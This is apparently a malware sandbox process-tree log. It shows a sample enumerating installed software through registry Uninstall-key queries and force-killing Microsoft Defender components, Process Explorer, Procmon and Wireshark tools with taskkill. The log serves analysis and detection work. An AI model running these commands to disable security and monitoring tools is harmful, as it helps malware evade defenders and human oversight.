C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-007E-0000-1000-0000000FF1CE}" /reg:323⤵PID:1004
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:4840
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0000-1000-0000000FF1CE}" /reg:643⤵PID:2684
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0000-1000-0000000FF1CE}" /reg:323⤵PID:4164
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "NisSrv.exe" /T /F2⤵
- Kills process with taskkill
PID:4264
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:3292
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0409-1000-0000000FF1CE}" /reg:643⤵PID:3796
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0409-1000-0000000FF1CE}" /reg:323⤵PID:4224
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:4608
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:643⤵PID:2188
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:323⤵PID:2592
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:1440
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:643⤵PID:2548
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:323⤵PID:4824
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:4272
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:643⤵PID:4756
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:323⤵PID:4888
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:4864
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:643⤵PID:4784
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:323⤵PID:4236
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:5032
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:643⤵PID:4968
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:323⤵PID:1388
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:3040
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:643⤵PID:1456
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:323⤵PID:2120
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:4836
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:643⤵PID:4008
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:323⤵PID:1136
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:4140
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:643⤵PID:2192
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:323⤵PID:4016
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "ConfigSecurityPolicy.exe" /T /F2⤵
- Kills process with taskkill
PID:1640
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:4604
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:643⤵PID:4376
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:323⤵PID:5108
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:4756
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:643⤵PID:5076
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:323⤵PID:4816
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:4148
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:643⤵PID:4904
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:323⤵PID:2336
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:4456
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{4A03706F-666A-4037-7777-5F2748764D10}" /reg:643⤵PID:1668
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{4A03706F-666A-4037-7777-5F2748764D10}" /reg:323⤵PID:4288
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:4264
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}" /reg:643⤵PID:4156
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}" /reg:323⤵PID:1528
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:1776
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:643⤵PID:2628
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:323⤵PID:4832
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:5052
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:643⤵PID:4816
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:323⤵PID:5020
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:1456
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:643⤵PID:2788
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:323⤵PID:4288
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F2⤵
- Kills process with taskkill
PID:3700
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "wireshark.exe" /T /F2⤵
- Kills process with taskkill
PID:5020
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "tshark.exe" /T /F2⤵
- Kills process with taskkill
PID:3112
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "text2pcap.exe" /T /F2⤵
- Kills process with taskkill
PID:1528
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "rawshark.exe" /T /F2⤵
- Kills process with taskkill
PID:5044
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "dumpcap.exe" /T /F2⤵
- Kills process with taskkill
PID:1668
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "capinfos.exe" /T /F2⤵
- Kills process with taskkill
PID:1800
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "Procmon.exe" /T /F2⤵
- Kills process with taskkill
PID:2336
-